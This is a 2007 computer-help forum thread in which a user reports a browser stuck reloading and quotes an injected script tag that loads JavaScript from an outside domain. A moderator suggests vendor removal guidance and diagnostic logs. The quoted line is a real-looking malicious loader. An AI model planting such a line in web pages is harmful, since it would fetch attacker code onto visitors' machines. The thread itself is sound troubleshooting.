Jump to content


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.

Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.


I Have Never Seen This Before! I Need Help!

  • Please log in to reply
2 replies to this topic

#1 Elodrei


  • Members
  • 3 posts
  • Local time:11:34 PM

Posted 15 June 2007 - 05:44 AM

I started to get this recently and I have to admit, I have never encountered such a thing and no matter how much I tried to find more information, I failed. There is absolutely nothing about this.

What happens is that often in the evening and sometimes in the morning or afternoon (it varies) I will load Firefox but the page stays blank and the browser keeps reloading. I am running it with the noscript addon. My default page is igoogle. I had the idea to look at the page source and there it was, the very first line :

&lt;script src=http://y66.us/2.js></script>

I then tried to log on using my Tablet PC which is my other device and I got the same thing. So far, I have not been able to find anything after scanning with AVG antivirus and antispyware, Adaware, Spybot and Windows Defender. I even ran Vundo removal tool but found nothing.

Any insights would be a great help at this point!

Edited by Elodrei, 15 June 2007 - 05:46 AM.

BC AdBot (Login to Remove)


#2 buddy215


  • Moderator
  • 13,414 posts
  • Gender:Male
  • Location:West Tennessee
  • Local time:07:34 AM

Posted 15 June 2007 - 06:42 AM

When trying to google this I get a lot of sites in Chinese but I think I have found the culprit. Check the info in the link below.

Trend Micro offers an online scan and in the link above it offers solutions for removing the infection. It only discusses it infecting IE. Interesting, but note the changes to your hosts file.

You can also post a Hijack This Log in the Hijack This forum, NOT in this forum, by following the directions in the link below.
“Every atom in your body came from a star that exploded and the atoms in your left hand probably came from a different star than your right hand. It really is the most poetic thing I know about physics...you are all stardust.”Lawrence M. Krauss
A 1792 U.S. penny, designed in part by Thomas Jefferson and George Washington, reads “Liberty Parent of Science & Industry.”

#3 Elodrei

  • Topic Starter

  • Members
  • 3 posts
  • Local time:11:34 PM

Posted 16 June 2007 - 01:08 AM

I checked the Hosts file and it looks fine. there are only two entries and they are not suspicious.

I will post a log.


0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users